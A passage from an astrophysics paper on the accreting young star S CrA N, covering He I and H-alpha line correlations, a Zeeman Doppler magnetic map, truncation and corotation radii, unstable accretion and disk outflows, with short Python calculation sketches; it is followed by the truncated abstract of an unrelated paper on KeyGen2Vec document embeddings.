field \\ (\(\pm\) 0.03) & (km.s\({}^{-1}\)) & (km.s\({}^{-1}\)) & (KG) \\ \hline \hline 0.00 & 1.373 \(\pm\) 0.003 & 41 \(\pm\) 1 & 1.17 \(\pm\) 0.03 \\ 0.14 & 2.35 \(\pm\) 0.04 & 54 \(\pm\) 2 & 1.30 \(\pm\) 0.05 \\ 0.27 & 2.54 \(\pm\) 0.03 & 74 \(\pm\) 2 & 1.68 \(\pm\) 0.04 \\ 0.41 & 2.37 \(\pm\) 0.03 & 66 \(\pm\) 2 & 1.31 \(\pm\) 0.03 \\ 0.54 & 2.40 \(\pm\) 0.03 & 63 \(\pm\) 2 & 1.12 \(\pm\) 0.03 \\ 0.69 & 1.80 \(\pm\) 0.02 & 42 \(\pm\) 1 & 1.08 \(\pm\) 0.03 \\ 0.82 & 0.99 \(\pm\) 0.01 & 44 \(\pm\) 2 & 0.84 \(\pm\) 0.03 \\ 0.95 & 0.88 \(\pm\) 0.01 & 46 \(\pm\) 2 & 1.37 \(\pm\) 0.05 \\ 1.09 & 1.96 \(\pm\) 0.04 & 50 \(\pm\) 2 & 1.33 \(\pm\) 0.04 \\ 1.23 & 2.27 \(\pm\) 0.04 & 48 \(\pm\) 2 & 1.32 \(\pm\) 0.04 \\ 1.36 & 2.80 \(\pm\) 0.02 & 93 \(\pm\) 2 & 1.08 \(\pm\) 0.02 \\ 1.78 & 1.91 \(\pm\) 0.03 & 43 \(\pm\) 2 & 1.01 \(\pm\) 0.05 \\ \hline \end{tabular} \end{table} Table 3: Radial velocities, equivalent width and longitudinal field derived for each phase in the He I NC. Figure 6: Radial velocities (top), equivalent width (middle), and longitudinal magnetic field (bottom) of the He I NC as a function of the stellar phase, when considering a stellar rotation period of \(7.3\pm 0.2\) days and considering the first date of observation as \(\phi=0\). When not visible, uncertainties are smaller than the symbol. Dotted black lines illustrate the best fits obtained, with a simple sine (middle and bottom) and the model of Pouilly et al. (2021) (top). The color code is the same as in Fig. 1. ### Correlations in \(H\alpha\). Fig. 10-bottom-left shows the auto-correlation matrix of the H\(\alpha\) line. Two main components can be identified: a main broad symmetric emission (from -400 to 400 km/s), truncated by a strong absorption from -200 to 0 km/s. It should be noted that this blue-shifted absorption is actually twofold: a saturated part spreads between -200 and -100 km/s, and a variable one between -100 and 0 km/s. This variable component is moderately anti-correlated (\(R_{ij}<-0.38\)) with the broad emission. ### Cross-correlations between He I and \(H\alpha\). All the correlations found between the H\(\alpha\) and the He I lines are moderate compared to the ones found for the previously mentioned auto-correlations matrices. Still, hints for possible correlation are visible and presented here. Fig. 10-bottom-middle shows that the He I NC seems correlated with the saturated part of the blue-shifted absorption in the H\(\alpha\) line, even though the correlation coefficient does not reach the 2\(\sigma\) significance level. This partial correlation is confirmed when inspecting Fig. 10-bottom-right. Indeed, the \(V\) profile exhibits the same correlation pattern with both the variable part in the blue-shifted absorption of H\(\alpha\) and the He I NC (see Fig. 10-top-middle). A moderate anti-correlation (\(R_{ij}\sim-0.38\)) is found between the variable blue-shifted absorption of H\(\alpha\) and the He I BC. However, considering the previous results, a negative correlation between the He I V profile and the He I BC should be found (Fig. 10-top-right), which is not the case. Either there is no correlation between these components, or the underlying correlation is being quenched due to a potential cross-talk. Such a moderate correlation can also be found between the whole blue-shifted absorption of H\(\alpha\) and the He I AC, with \(R_{ij}\sim 0.38\) (green light area at the top of Fig. 10-bottom-middle). Only this time, we do not have other diagnoses to confirm this correlation. 
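The correlation matrices used above follow directly from Eqs. (1)-(2); a minimal NumPy sketch (array names are ours), with the 2\(\sigma\) significance level of 0.76 quoted in the text applied afterwards:

```python
import numpy as np

def correlation_matrix(series_a, series_b):
    """Pearson coefficient R_ij between every velocity channel of two line time series.

    series_a: (n_obs, n_pix_a) fluxes of the first line over the 12 observations
    series_b: (n_obs, n_pix_b) fluxes of the second line
    Returns R of shape (n_pix_a, n_pix_b), following Eqs. (1)-(2).
    """
    a = series_a - series_a.mean(axis=0)
    b = series_b - series_b.mean(axis=0)
    n = series_a.shape[0]
    cov = a.T @ b / (n - 1)                      # C_ij
    var_a = (a ** 2).sum(axis=0) / (n - 1)       # C_ii
    var_b = (b ** 2).sum(axis=0) / (n - 1)       # C_jj
    return cov / np.sqrt(np.outer(var_a, var_b))

# Example: cross-correlation between H-alpha and He I, thresholded at the 2-sigma level
# R = correlation_matrix(halpha_series, hei_series)
# significant = np.abs(R) >= 0.76
```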
### Magnetic field reconstruction The Zeeman Doppler Imaging (ZDI) technique uses the rotational modulation of Stokes \(V\) profiles to infer the large-scale magnetic configuration. We use the ZDIpy code, which assumes a decomposition of the field in spherical harmonics and adopts a weak-field approximation to reconstruct its topology, as described in full detail in Folsom et al. (2018). ZDIpy applies a regularized fitting algorithm that simultaneously maximizes the entropy of the reconstructed topology while keeping the corresponding \(\chi^{2}\) below some target value (Skilling and Bryan, 1984). The obtained map is therefore interpreted as the minimal information map fitting the observed LSD \(V\) data with a goodness determined by the target \(\chi^{2}\). The ZDI procedure described above usually also fits Stokes \(I\) profiles to reconstruct the brightness distribution of the star. However, for S CrA N, we never reached a satisfactory fit for the LSD \(I\). That is why a uniform brightness was assumed. This uniform brightness was obtained with a Voigt model fitting the observed median shape of LSD \(I\) (see Fig. 2). In order to reconstruct the magnetic maps, one needs to know the stellar rotation period and inclination with respect to the line of sight. From the variability analysis of the He I line, we adopt a stellar period \(P_{*}=7.3\pm 0.2\) days (see Table 2). Combining this stellar period with \(v\sin i\), and a radius estimate presented in Section 4, we derive the star's inclination \(i=39^{\circ}\pm 16^{\circ}\), which is in agreement at a 1-\(\sigma\) level with the inclination of the inner disk as determined by GRAVITY Collaboration et al. (2021) (27 \({}^{\circ}\pm 3^{\circ}\)). Considering the propagation of uncertainties in the computation of our stellar inclination, we adopt hereafter the value from GRAVITY Collaboration et al. (2021) as the inclination of the star: \(i=27^{\circ}\pm 3^{\circ}\). The ZDI procedure ran over 16 iterations to maximize entropy, reaching the target reduced \(\chi^{2}\) of 1.5. This value represents the smallest target we could reach without fitting the noise of the data. The spherical harmonics expansion was truncated to consider only the modes where \(l\leq 10\) and reproduced the LSD \(V\) profiles between -25 km/s and +25 km/s. Figure 8: Comparison of all the periods derived in this study, gathered according to what profile gave them. Red dashed vertical lines illustrate the stellar rotation period (\(P_{*}\)) and half its value, surrounded by their uncertainty (light blue shade). All values are estimated from 2D periodograms except for (a), which is derived from radial velocities, and is chosen as \(P_{*}\). Figure 7: 2D Periodograms of the Stokes \(I\) NC (upper-left), BC (lower-left), AC (lower-right), and Stokes \(V\) (upper-right) in He I \(\lambda\)5876. The red dashed lines mark a period of 7.4 days (NC and Stokes \(V\)), 3.2 days (BC and AC), and 6.6 days (AC). The black dashed contours denote a constant FAP of 3% (except 15% for the BC). Below the periodograms are shown the average profiles (black line) surrounded by their 1-\(\sigma\) deviations (light blue). Figure 9: Balmer series in S CrA N. The color code is the same as Fig. 2. The vertical dotted line shows the stellar radial velocity, while the horizontal dotted lines show the continuum level for each line. The y-scale of H\(\alpha\) has been changed, for clarity.
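The inclination adopted above follows directly from the rotation period, \(v\sin i\), and the stellar radius; a quick numerical check with rounded constants (values from Table 2 and Section 4):

```python
import numpy as np

R_SUN_KM = 6.957e5   # solar radius [km]
DAY_S = 86400.0

def inclination_deg(vsini_kms, period_days, radius_rsun):
    """Inclination from sin i = (v sin i) * P_* / (2 pi R_*)."""
    v_eq = 2.0 * np.pi * radius_rsun * R_SUN_KM / (period_days * DAY_S)  # equatorial velocity [km/s]
    return np.degrees(np.arcsin(vsini_kms / v_eq))

# v sin i = 10 km/s, P_* = 7.3 d, R_* = 2.3 R_sun  ->  ~39 deg, as derived in the text
print(inclination_deg(10.0, 7.3, 2.3))
```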
The reconstructed \(V\) profiles are over-plotted to the observed LSD \(V\) profiles along with the derived magnetic maps in Fig. 11. The three maps represent the projection of the magnetic vector on the spherical basis, which translates into a radial field (positive polarity meaning a vector going out of the surface), azimuthal field (positive polarity meaning a vector oriented clockwise), and meridional field (positive polarity meaning a vector oriented toward the South direction). We represent on each map the rotation phases at which each observation is obtained, with the initial phase \(\phi=0\) corresponding to the first date of observation. The large-scale magnetic field best reproducing our Stokes V profiles is as strong as 5.4 kG (which is within the weak-field approximation validity domain), with a mean intensity of 950 G, and a global axisymmetry of 68%. The poloidal component of this field (82% of the total energy) is primarily located in the dipolar component, which represents 27% of the total magnetic energy, even though higher order poloidal modes are significantly present (up to 25% and 16% of the total magnetic energy for the quadrupole and the octupole, respectively). This dipole's maximum intensity (816 G) is reached at intermediate latitude (56\({}^{\circ}\)), at phase 0.29. The main magnetic properties of the system are listed in Table 4. \begin{table} \begin{tabular}{l c} \hline \hline Property & Value \\ \hline Maximum intensity & 5.4 kG \\ Mean intensity & 950 G \\ Axisymmetry\({}^{a}\) & 68 \% \\ \hline **Toroidal field\({}^{a}\)** & **18\%** \\ Axisymmetry\({}^{b}\) & 41 \% \\ \hline **Poloidal field\({}^{a}\)** & **82\%** \\ Axisymmetry\({}^{c}\) & 73 \% \\ Dipole\({}^{c}\) & 33 \% \\ Maximum intensity & 816 G \\ Pole’s location\({}^{d}\) [lat; phase] & [56\({}^{\circ}\); 0.29] \\ Quadrupole\({}^{c}\) & 30 \% \\ Octupole\({}^{c}\) & 19 \% \\ \hline \end{tabular} 1 \end{table} Table 4: Main magnetic field properties from ZDI. Figure 10: Correlation matrices in He I (top row): auto-correlation of the full Helium line at 587.6 nm (left), correlation between the He I NC and the \(V\) profile (middle), and correlation between the He I BC and the \(V\) profile (right). Correlations matrices in H\(\alpha\) (bottom row): auto-correlation of the full H\(\alpha\) line (left), correlation between the H\(\alpha\) line and the full He I line (middle), and correlation between the H\(\alpha\) line and the He I \(V\) profile (right). The dashed black contours show the 2\(\sigma\) significance level. The average profiles are represented on the bottom and left side of each panel (solid black line) and are surrounded by their standard deviation (light blue shade), with the continuum level shown with dashed black lines. ## 4 Discussion ### S CrA N: a strong accretor? Typical CTTS have effective temperatures between 3000 and 5000 K, (spectral type G or later), masses most generally between 0.3 and 1 M\({}_{\odot}\), with an upper limit of about 2 M\({}_{\odot}\), and mass accretion rates of the order of 10\({}^{-7}\)-10\({}^{-10}\) M\({}_{\odot}\) yr\({}^{-1}\). They probe the end of the fully convective Hayashi phase of the pre-main sequence evolution, around ages of 1 to 2 Myr (e.g. Herczeg & Hillenbrand, 2014; Villebrun et al., 2019; Nicholson et al., 2021). When fitting our ESPaDOnS spectra, we found an effective temperature for S CrA N of 4300 \(\pm\) 100 K, in agreement with the previous determinations (Table 2). We used the Gaia DR3 data and applied the method of Galli et al. 
(2020) to derive the distance to S CrA N (see Appendix C). We adopted a value of d = 152.4 \(\pm\) 0.4 pc. We used the luminosity \(L_{*}\) = 1.67 \(\pm\) 0.8 \(L_{\odot}\) from Prato et al. (2003), corrected with our new distance to place S CrA N in the Hertzsprung-Russell diagram. Using the CESAM evolutionary model (Morel & Lebreton, 2008; Marques et al., 2013), we estimated a mass \(M_{*}\) = 0.8 \(\pm\) 0.1 M\({}_{\odot}\) and stellar radius \(R_{*}\) = 2.3 \(\pm\) 0.6 \(R_{\odot}\), which gives \(\log g\) = 3.6 \(\pm\) 0.2. The star is placed at an age of about 1 Myr, i.e. younger than typical CTTS. As most of the CTTS, S CrA N is then fully convective. The photospheric lines of CTTS generally appear shallower than those of non-accreting stars, suggesting an excess of continuum emission. This so-called veiling can be observed in different regions of the spectrum of CTTS, with different interpretations: in the near-infrared range, this excess might be attributed to the dust emission of the protoplanetary disk (Sousa et al., 2023); in the ultraviolet-visible range, this excess is attributed to an accretion shock that behaves like a \(\sim\) 8 000 K blackbody continuum emission that superimposes to the photospheric continuum. In very active stars, emission lines spectra may also blend the photospheric lines as early discussed in, e.g., Bertout (1984) and shown in, e.g., Petrov et al. (2011); Dodin & Lamzin (2012); Rei et al. (2018). This veiling of optical spectral lines is typically lower than 2 around 5500 A (Basri & Batalha, 1990; Hartigan et al., 1991). In S CrA N, we found no trend between wavelength and the veiling, which happens to be strongly variable around 5500 A with values ranging from 2 to 11. This finding is consistent with that of Sullivan et al. (2019), who also detected a strong variability and a large amplitude (between 2-6) of veiling in the near-infrared range. Combined with its young age, this evidence of very strong accretion could indicate an evolutionary stage between Class I and Class II for S CrA N. This is further confirmed by the place of the S CrA system in the color-color diagram proposed by Koenig & Leisawitz (2014). With All-WISE measurements \(W1=5.1\pm 0.1\), \(W2=4.0\pm 0.1\) and \(W3=2.08\pm 0.01\), the binary system lands at the frontier between protostars and T Tauri stars2. Footnote 2: With All-WISE, S CrA N is observed together with S CrA S, due to the angular resolution of the observations (\(\sim\) 6”). Since the two components are coeval (Gahm et al., 2018), this does not affect the interpretation regarding their young age. ### The magnetosphere From its fundamental parameters, S CrA N can be pictured as a young, fully convective T Tauri star. Should the surface magnetic field of CTTS be controlled by their internal structure only, we might expect a strong (\(\sim\)1 kG) axisymmetric large-scale field, mostly poloidal, with a strong dipole relative to higher poloidal modes (Gregory et al., 2012). This expectation is only partially met by the magnetic maps obtained in Section 3: the total field is mostly (82%) a poloidal field that is axisymmetric (73%), with a strong (816 G) dipole. However, the dipole and the quadrupole represent a similar portion of the poloidal field (33% and 30%, respectively), while the octupole's contribution is smaller, but still significant (19%). 
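As a side check, the adopted stellar parameters are mutually consistent; the short sketch below (rounded solar constants, our own helper names) recovers the quoted \(\log g\) and a luminosity close to the adopted \(L_{*}\):

```python
import numpy as np

G_CGS = 6.674e-8      # gravitational constant [cm^3 g^-1 s^-2]
M_SUN_G = 1.989e33
R_SUN_CM = 6.957e10
T_SUN_K = 5772.0

def log_g(mass_msun, radius_rsun):
    """Surface gravity log10(g [cgs]) from mass and radius."""
    g = G_CGS * mass_msun * M_SUN_G / (radius_rsun * R_SUN_CM) ** 2
    return np.log10(g)

def luminosity_lsun(radius_rsun, teff_k):
    """Stefan-Boltzmann scaling: L/Lsun = (R/Rsun)^2 (Teff/Tsun)^4."""
    return radius_rsun ** 2 * (teff_k / T_SUN_K) ** 4

print(log_g(0.8, 2.3))             # ~3.6, as quoted
print(luminosity_lsun(2.3, 4300))  # ~1.6 Lsun, consistent with L_* = 1.67 +/- 0.8 Lsun
```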
Our uncertainties on the luminosity may be the reason for this difference between the prediction and the reconstructed maps, but it should be noted that this region of the H-R diagram is observationally found to be populated with a variety of magnetic topologies (Donati et al., 2020; Nicholson et al., 2021). It is also worth recalling that S CrA N is a strong accretor, and that the possible impact of accretion on the inner structure of stars is still to be explored. We estimate the truncation radius (i.e. the radius at which the magnetic pressure equals the ram gas pressure) from this magnetic reconstruction, using the formula from Bessolaz et al. (2008): \[\frac{R_{t}}{R_{*}}\simeq 2\,B_{*}^{4/7}\,\dot{M}^{-2/7}\,M_{*}^{-1/7}\,R_{*}^{5/7}, \tag{3}\] where the stellar field in the equatorial plane \(B_{\ast}\) (i.e., half the dipole's maximum intensity) has been normalised to 140 G, the accretion rate \(\dot{M}\) to \(10^{-8}\) M\({}_{\odot}\) yr\({}^{-1}\), the stellar mass to 0.8 M\({}_{\odot}\), and the stellar radius to 2 R\({}_{\odot}\), and where a Mach number of \(\sim 1\) has been assumed. Figure 11: Polar projection of the magnetic maps (right) reconstructed from the LSD \(V\) observations (left, coloured lines). Black crosses over-plotted to the LSD profiles show the reconstructed \(V\), on the right of which the cycle number and phase are mentioned. The red ticks surrounding each map show the observed phases, going increasingly clockwise, starting from the South direction. Dashed black circles show co-latitudes of 27\({}^{\circ}\) (i), 63\({}^{\circ}\) (90-i) and 117\({}^{\circ}\) (90+i). The solid black line shows the equator. Since the ESPaDOnS data are not flux-calibrated, we estimated the accretion rate thanks to the width of H\(\alpha\) at 10% peak intensity using the relationship from Natta et al. (2004): \[\log\dot{M}_{\rm acc}=-12.89(\pm 0.3)+9.7(\pm 0.7)\times 10^{-3}\ {\rm H}\alpha 10\%, \tag{4}\] where H\(\alpha\)10% is the considered width in km/s, and \(\dot{M}_{\rm acc}\) is in M\({}_{\odot}\) yr\({}^{-1}\). With widths ranging from 579 km/s to 693 km/s, we obtained accretion rate logarithms between -7.3 and -6.2 with a median value \(\log\dot{M}_{\rm acc}=-6.9\pm 0.7\), which is consistent with the value of \((1.0\pm 0.1)\times 10^{-7}\) M\({}_{\odot}\) yr\({}^{-1}\) from Sullivan et al. (2019), when correcting the distance. Because they use the Br\(\gamma\) line to derive this accretion rate, we considered this value as more reliable than our own (see Alcala et al., 2014) to compute the truncation radius. Combined with the stellar radius and mass, and the magnetic topology from the present work, we obtained: \[R_{t}=2.1\pm 0.4\ R_{\ast}, \tag{5}\] where the uncertainty is derived from the propagation of errors on the involved parameters through Eq. 3. This value is likely a lower boundary for the truncation radius since the ZDI technique is blind to the magnetic field in the region of formation of the emission lines, leading to inconsistency between our reconstructed maps and the direct diagnoses of accretion, as shown below. The derived truncation radius implies a colatitude of the accretion spot of \(44^{\circ}\pm 5^{\circ}\) in a purely dipolar accretion model, which is consistent with the derived obliquity of the dipole from ZDI (\(56^{\circ}\)). However, both values seem to contradict the very high apparent latitude of the post-shock region as traced by the He I NC radial velocity curve (Fig. 6-top). The single spot model from Pouilly et al.
(2021) applied to these data gives a latitude of \(86^{\circ}\pm 1^{\circ}\). The asymmetry of the NC attributed to a velocity gradient in the post-shock region does not vary with phase, which is also supportive of a spot located at high latitude. The magnetic field projected along the line of sight (or longitudinal magnetic field \(B_{l}\)) associated with the NC of He I is positive at all phases (see Fig.6-bottom, Table 3). If one assumes that the NC is arising from the post-shock region, this means at least part of the total magnetic field should be positive near the pole of the star, as shown earlier. However, the magnetic maps reconstructed from ZDI (Fig. 11) show that regions with a positive magnetic field (i.e. coming towards the observer) at virtually every phase are only present in colatitudes larger than \(\sim 60^{\circ}\), which corresponds to a portion of the star occasionally visible only (outside the second dashed black ring). This discrepancy leads us to consider the tomographic reconstructions presented in this work as not definite. Additional developments considering this emission line or any other line constraining a different region than the LSD profiles (e.g., Ca II infrared triplet (IRT), Fe II 42 multiplet) are required to combine the different constraints in a single tomographic reconstruction (such as in Donati et al., 2020), which is beyond the scope of this paper. Finally, from this truncation radius, one can also deduce the expected accretion velocity \(v_{\rm acc}\) (i.e. the velocity of the gas free-falling from the truncation radius onto the stellar surface) thanks to energy conservation. This gas is producing the AC observed in He I (Fig. 5), the higher members of the Balmer series (Fig. 9) and FeII (Fig. B.1). Thanks to our estimate of stellar mass and radius, we obtain \(v_{\rm acc}=267\) km.s\({}^{-1}\). This velocity is included in the range of velocities of the AC, which makes the value of \(R_{t}\) derived from ZDI consistent with our values of \(M_{\ast}\) and \(R_{\ast}\). However, the maximum velocity of the AC is larger than the free-fall velocity from infinity (\(v_{\infty}=370\) km.s\({}^{-1}\)), which points out either a wrong estimate of \(M_{\ast}\) and \(R_{\ast}\), or a significant broadening of these absorptions, the source of which remaining unknown. ### An unstable accretion regime? The observed intensity and variability of various emission lines (He I, Fe II, Ca II, for instance; see Appendix B), combined with the highly veiled photospheric lines, suggest that intense accretion processes occur in the vicinity of S CrA N. One way to better constrain the accretion process is to compare the corotation radius and the truncation radius. Indeed, when the truncation to corotation radii ratio becomes small enough, Rayleigh-Taylor instability can be triggered at the magnetosphere-disk boundary (Kulkarni & Romanova, 2008). Then, magnetospheric accretion enters the so-called unstable accretion regime, where classical accretion funnels are observed, but also accretion tongues. This phenomenon and its observable signatures have been extensively modeled (Kurosawa & Romanova, 2013; Blinova et al., 2016) and has recently been reproduced in laboratory experiments that scale to the expected YSOs' accretion tongues (Burdonov et al., 2022). Blinova et al. (2016) observed unstable accretion for simulations where \(R_{t}/R_{\rm co}<0.71\), for obliquities lower than \(20^{\circ}\). 
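The numbers entering Eqs. (3) and (5), the free-fall velocities quoted above, and the corotation radius used in the next subsection combine as in the sketch below. This is a back-of-the-envelope reproduction with rounded constants (the equatorial dipole field is taken as half the 816 G maximum and the Br\(\gamma\)-based accretion rate of \(10^{-7}\) M\({}_{\odot}\) yr\({}^{-1}\) is adopted, as in the text); small differences in the last digit with respect to the quoted values come from rounding.

```python
import numpy as np

G_CGS = 6.674e-8
M_SUN_G = 1.989e33
R_SUN_CM = 6.957e10

M_STAR, R_STAR = 0.8, 2.3            # [Msun], [Rsun]
B_EQ_G = 816.0 / 2.0                 # equatorial dipole field [G]
MDOT = 1.0e-7                        # accretion rate [Msun/yr]
P_ROT_S = 7.3 * 86400.0              # rotation period [s]

# Truncation radius, Eq. (3), with the normalisations given below the equation
r_t = (2.0 * (B_EQ_G / 140.0) ** (4 / 7) * (MDOT / 1e-8) ** (-2 / 7)
       * (M_STAR / 0.8) ** (-1 / 7) * (R_STAR / 2.0) ** (5 / 7))    # ~2.1 R_*

# Corotation radius from Kepler's third law: R_co = (G M_* P_*^2 / 4 pi^2)^(1/3)
r_co_cm = (G_CGS * M_STAR * M_SUN_G * P_ROT_S ** 2 / (4.0 * np.pi ** 2)) ** (1 / 3)
r_co = r_co_cm / (R_STAR * R_SUN_CM)                                 # ~6.4 R_*

# Free-fall velocity from R_t onto the surface, and from infinity
gm = G_CGS * M_STAR * M_SUN_G
r_star_cm = R_STAR * R_SUN_CM
v_acc = np.sqrt(2.0 * gm * (1.0 / r_star_cm - 1.0 / (r_t * r_star_cm))) / 1e5  # ~265 km/s
v_inf = np.sqrt(2.0 * gm / r_star_cm) / 1e5                                    # ~365 km/s

print(r_t, r_co, r_t / r_co)         # ~2.1, ~6.4, ~0.33
```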
With the set of stellar parameters we derived (see Table 2) we computed a corotation radius of \(R_{\rm co}=6.4\pm 1.7\) R\({}_{\ast}\), which yields a truncation to corotation radii ratio \(R_{t}/R_{\rm co}=0.33\ \pm\ 0.11\), and places S CrA N in the unstable accretion scenario. The simulations from Kurosawa & Romanova (2013) showed that a proxy to the accretion regime lies in the profiles of the higher members of the Balmer series (\(H\gamma\) and \(H\delta\)): in the stable case, a red-shifted absorption appears for about half the rotation cycle, before it disappears, coming and going with stellar periodicity. This absorption is due to the visible accretion funnel which is absorbing the star's continuum while it remains in the line of sight. In the unstable case, this red-shifted absorption is expected to be present at virtually every phase of the rotation cycle, since there is at least one accretion tongue in the line of sight at all time. The profiles of \(H\gamma\) and \(H\delta\) we observe in S CrA N display this absorption at all phases as seen in Fig. 9, in agreement with unstable accretion. ### Accreting structures This unstable accretion regime sets a new context for the interpretation of the features observed in the emission lines presented earlier. The He I \(\lambda 5876\) NC likely arises from a post-shock region in a single accretion spot located at high latitudes (\(\sim 86^{\circ}\)). The origin in a post-shock region is suggested by the small radial velocity of the flow producing the NC (\(\sim 2\) km/s, see Sec.4.2). The single-spot model is corroborated by the consistency between the periodicity of the Stokes V signatures (both in the LSD profiles and the He I line) and the periodicity of the He I NC profiles. The longitudinal field's curve in the He I line displays a complex modulation, with a substantial departure from the sine model near the extreme radial velocities, around phases 0.3 and 0.9 (see Fig. 6). That could be explained if the star has a complex magnetic field, significantly differing from a simple dipole as suggested by ZDI from the present work. Finally, the asym metry of the NC in Stokes \(I\) (steep blue wing and mild red wing; see Fig. 5) and the departure from anti-symmetry in Stokes \(V\) (blue lobe stronger than red lobe) would come from the velocity gradient in the region of emission. This asymmetry is observed at all phases with no noticeable modulation, suggesting a high latitude for the accretion spot. We speculate that the red-shifted AC seen in He I \(\lambda\)5876, \(H\gamma\), and \(H\delta\) is formed in two distinct structures: first, in an accretion funnel located around phase 0.2 (called the "main" column hereafter), which produces the NC at its footprint, when forming an accretion shock; then, in another accretion column located around phase 0.7 (called the "secondary" column hereafter, opposed to the main one), which does not have any NC counterpart, because its density is much smaller than in the main column, where accretion is favoured, due to the magnetic misalignment. An AC is nonetheless produced by the free-falling material of the secondary column which absorbs the light emerging from the photosphere. These opposite structures then produce an artificial periodicity of half the stellar period (\(P_{*}/2=3.65\simeq 3.4\pm 0.4\) days, see Fig. 
8), the actual stellar period being detected for the lowest velocities of the AC (\(P_{*}=7.3\simeq 6.6\pm 1.3\) days), because only the main accretion column is dense enough at small velocities (i.e., in the upper part of the column) to produce an absorption. Finally, the He I \(\lambda\)5876 BC is most likely formed by the infalling gas in both the main and the secondary funnels, since the same artificial periodicity as the AC is observed, and its centroid is mostly red-shifted. As discussed in Beristain et al. (2001), this tendency in the central velocity of the line can be obtained with material following a purely dipolar field at polar angles lower than 54.7\({}^{\circ}\), which corresponds to accreting gas. ### Outflows Lima et al. (2010) modeled the H\(\alpha\) line in the case of a CTTS undergoing both magnetospheric accretion and a disk wind. When comparing the H\(\alpha\) lines we observed (Fig. 9) with their grids of models, the deep blue-shifted absorption of our profiles appears to be well reproduced with their models combining a high accretion rate (10\({}^{-7}\) M\({}_{\odot}\) yr\({}^{-1}\)), and a hot (\(\sim\) 8000-10000 K) disk wind with a density of a few 10\({}^{-11}\) g/cm\({}^{3}\) and an outer radius of a few tens of stellar radii (see their Figs. 4 and 6). It should be noted that their model reproduces the bulk of the absorption, but not the variable features seen at small velocities. We surmise that these features come from disk outflows because of their moderate correlation with accretion signatures (namely, the He I NC and He I AC) as seen in Fig. 10. Numerical simulations (Romanova et al., 2009; Zanni and Ferreira, 2013; Pantolmos et al., 2020) have shown that the stellar magnetic field lines threading the disk outside the accretion columns are open, further producing transient ejections (i.e., magnetospheric ejections/conical winds) and/or disk winds. These outflows are also suspected when comparing the truncation radius we computed with the size of the region emitting the hydrogen \(Br\gamma\) line in S CrA N. This region can be spatially constrained to \(R_{Br\gamma}=7.7\,\pm 2.2\,R_{*}\) thanks to interferometric observations (GRAVITY Collaboration et al., 2017; Gravity Collaboration et al., 2023). The given value is an update from Gravity Collaboration et al. (2023) with our new values for distance and \(R_{*}\). Since \(R_{Br\gamma}\) extends well beyond \(R_{t}=2.1\pm 0.4\,R_{*}\), disk outflows must account for part of the emission observed in this line. Finally, the Herbig-Haro object HH729 has been attributed to S CrA N (Peterson et al., 2011). The forbidden lines of [\(OI\)] at 6300.2 A and 6363.8 A and [\(SII\)] at 6730 A are usually interpreted as tracers of outflows at different scales (see e.g. Alexander et al., 2014; Pascucci et al., 2020; Gangi et al., 2023). These lines are present in the spectra of S CrA N with a strong blue-shifted peak (\(\sim\) -120 km/s) and asymmetry (see Appendix B for the profiles), strengthening the idea of a large-scale outflow arising from the inner regions. ## 5 Conclusions Thanks to spectropolarimetric observations in the optical range with ESPaDOnS at CFHT, we have probed the star-disk interaction in the innermost regions of the North component of the young binary system S CrA. With its confirmed high accretion rate (10\({}^{-7}\) M\({}_{\odot}\) yr\({}^{-1}\)), this object is an ideal target for studying the magnetospheric accretion scenario in a stronger regime than in CTTS.
Our major findings are summarized below: * When fitting the ESPaDOnS spectra and using CESAM evolutionary models, S CrA N appears to have a mass of 0.8 M\({}_{\odot}\), to be fully convective, and to be about 1 Myr old. As in previous determinations in the near-infrared range, the veiling we derive around 5500 A is strongly variable and high (i.e., ranging from 2 to 11), which suggests that the star experiences a strong accretion regime. Combined with the young age, this could indicate an evolutionary stage between Class I and Class II. * This evolutionary stage is also in line with the large-scale magnetic field we have reconstructed through ZDI. We obtained a total field as strong as 5.4 kG and not strongly axi-symmetric, whose dipolar contribution represents about a third of the total field. With higher poloidal orders being significant (\(\sim\) 50%), the large-scale topology of the magnetic field appears rather complex when compared with CTTSs. * Additional developments are needed to paint a complete and coherent view of the magnetic topology of S CrA N by including the constraints from the emission lines (such as He I, the Ca II IRT or the Fe II 42 multiplet) and developing more complex models to reproduce the emitting regions of these lines and their properties. * We derive a magnetic truncation radius of \(\sim 2\,R_{*}\), and a corotation radius of \(\sim 6\,R_{*}\), suggesting that S CrA N is in an unstable accretion regime. Looking at the Helium and Hydrogen line profiles and periodicities, we suggest that this accretion occurs in an unstable scenario, along two distinct accretion structures: one main accretion column associated with the accretion shock, and a secondary accretion column with a density too low to produce a detectable accretion shock. * The emission lines of the hydrogen Balmer series are highly variable and display multi-component profiles. The observed H\(\alpha\) line profiles exhibit clear signatures of an outflow and are in good agreement with simulations of a hot and dense disk wind. This finding is compatible with the size of the \(Br\gamma\) emitting region measured with GRAVITY (\(\sim 8\,R_{*}\)), which is substantially larger than the truncation radius. Our spectropolarimetric campaign in the optical allows us to characterize the star-disk interactions at play in the innermost regions of S CrA N and, when combined with near-infrared interferometry, to provide a consistent view of these complex and variable regions. Given the strong and unstable accretion regime, probing the accretion-ejection processes would benefit from a temporal follow-up of these phenomena through simultaneous observations combining photometry, spectroscopy, and interferometry in various spectral ranges. ###### Acknowledgements. This work is supported by the French National Research Agency in the framework of the "investissements d'avenir" program (ANR-15-IDEX-02). This work has made use of data from the European Space Agency (ESA) mission _Gaia_ [https://www.cosmos.esa.int/gaia/](https://www.cosmos.esa.int/gaia/), processed by the _Gaia_ Data Processing and Analysis Consortium (DPAC, [https://www.cosmos.esa.int/web/gaia/apac/consortium](https://www.cosmos.esa.int/web/gaia/apac/consortium)). Funding for the DPAC has been provided by national institutions, in particular the institutions participating in the _Gaia_ Multilateral Agreement.
This work has made use of the VALD database, operated at Uppsala University, the Institute of Astronomy RAS in Moscow, and the University of Vienna. Finally, we address our greatest thanks to the referee of this article for their fruitful suggestions and comments.
2310.19650
KeyGen2Vec: Learning Document Embedding via Multi-label Keyword Generation in Question-Answering
Representing documents into high dimensional embedding space while preserving the structural similarity between document sources has been an ultimate goal for many works on text representation learning. Current embedding models, however, mainly rely on the availability of label supervision to increase the expressiveness of the resulting embeddings. In contrast, unsupervised embeddings are cheap, but they often cannot capture implicit structure in target corpus, particularly for samples that come from different distribution with the pretraining source. Our study aims to loosen up the dependency on label supervision by learning document embeddings via Sequence-to-Sequence (Seq2Seq) text generator. Specifically, we reformulate keyphrase generation task into multi-label keyword generation in community-based Question Answering (cQA). Our empirical results show that KeyGen2Vec in general is superior than multi-label keyword classifier by up to 14.7% based on Purity, Normalized Mutual Information (NMI), and F1-Score metrics. Interestingly, although in general the absolute advantage of learning embeddings through label supervision is highly positive across evaluation datasets, 